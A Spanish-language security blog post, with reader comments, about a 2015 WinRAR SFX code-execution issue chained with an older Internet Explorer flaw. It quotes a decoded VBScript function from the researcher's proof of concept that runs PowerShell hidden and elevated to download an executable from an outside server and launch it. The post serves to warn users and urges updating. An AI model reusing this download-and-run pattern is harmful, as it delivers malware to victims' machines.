30 sep. 2015

Vulnerabilidad crítica en WinRAR (Actualiza!)

Según Mohammad Reza Espargham, un investigador de seguridad del Vulnerability-Lab, la versión estable de WinRAR 5.21 para Windows tiene una vulnerabilidad que permite de ejecución de código remoto (RCE).

La vulnerabilidad classificada como de "Alta severidad" tiene una puntuación de 9/10 en CVSS y puede utilizarse para insertar código HTML malicioso dentro del "texto a mostrar en la ventana SFX", la cual es agregar al momento de crear un nuevo archivo SFX. Los archivos SFX de WinRAR permiten crear un archivo comprimido autoextraíble.
En este caso, al abrir el archivo SFX, se puede ver que se detecta el exploit para CVE-2014-6332 MS15-064, la cual permite ejecución de código a través del aprovechamiento de objetos de Internet Explorer. Es decir que la combinación de esta vulnerabilidad ya solucionada en el navegador y el código en WinRAR, se puede ejecutar la aplicación dañina.

Cuidado: si se decodifica el código publicado por Espargham, se puede ver que el mismo descarga un Putty desde un servidor externo. Esta aplicación se ejecutará el momento de abrir el archivo SFX.
function runmumaa() 
On Error Resume Next
set shell=createobject("Shell.Application")
command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile
('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe','load.exe');
$(New-Object -com Shell.Application).ShellExecute('load.exe');"
shell.ShellExecute "powershell.exe", "-Command " & command, "", "runas", 0
end function
Según puede verse en el video de la prueba de concepto publicada por Espargham, al abrir un archivo SFX, los atacantes remotos pueden ejecutar código arbitrario en el sistema de la víctima.
Según hemos podido comprobar desde Segu-Info, la vulnerabilidad existe en todas las versiones 5.X de WinRAR. Si bien todavía no existe una actualización de WinRAR, se puede utilizar la nueva versión 5.3Beta de WinRAR que no es vulnerable.

Actualización 01/10: WinRAR ha publicado un post sobre el tema. Mis comentarios sobre el mismo, más abajo.

Finalmente, se trata del aprovechamiento malicioso de una funcionalidad WinRAR que permite la ejecución de código HTML a través de objeto de IE incrustado (innecesariamente) en el compresor.

Actualización 05/10: otro análisis realizado por Security Art Work.

Actualización: Eugene Roshal, el creador de WinRAR, ha publicado su descargo.

Fuente: The Hacker News

5 comentarios:

  1. Convengamos que alguien que descargue de Internet y ejecute un .exe debe estar infectado hasta por las dudas.

    Leer el CVE y el MS para identificar desde donde se acarrea la vulnerabilidad.

    Muy interesante el artículo, ya actualice mi WinRAR!

    ResponderEliminar
  2. Creeo que deberiais contrastar las noticias antes de publicarlas, en winrar.es esta la explicacion correcta a esta "vulnerabilidad"

    ResponderEliminar
    Respuestas
    1. Obviamente la gente de WinRAR dirá que no es una vulnerabilidad. Ahora aclaro: yo no pido que se cambie de producto, simplemente que se actualice a la nueva versión y tb menciono claramente que es una combinación entre la vulnerabilidad ya solucionada en Windows y el código incluido en el SFX.

      Con respecto a lo mencionado por WinRAR una aclaración:
      Efectivamente cualquier usuario que no actualice o que descargue un EXE será vulnerable pero eso no quiere decir que en WinRAR no se pueda hacer lo que se explica en el post y en el video del descubridor.
      Ejecutar un código HTML desde un server remoto y descargar una aplicación sin informar al usuario, no es adecuado.
      Por otro lado este comportamiento NO se dá en la versión 5.3, lo cual indica que efectivamente WinRAR ha mejorado ese comportamiento indeseado.

      Cristian

      Eliminar
  3. No es una vulnerabilidad nueva, es una vulnerabilidad ya solucionada por Microsoft en 2014. La prueba que se indica no funciona en ningun sistema actualizado, solo en sistemas no parcheados. En estos sistemas no actualizados, tambien puedes pegar el URL que proporciona el codigo perl en Internet Explorer y tambien funciona. Por otra parte la nueva version no tiene ningun cambio a este respecto (salio mucho antes que esta "vulnerabilidad"), sigue usando el motor de internet explorer que si no esta parcheado tiene el mismo problema.

    ResponderEliminar

Gracias por dejar un comentario en Segu-Info
Si vas a dejar una consulta, procura tener habilitado tu perfil en Blogger o deja una forma de contacto.

Gracias por comentar!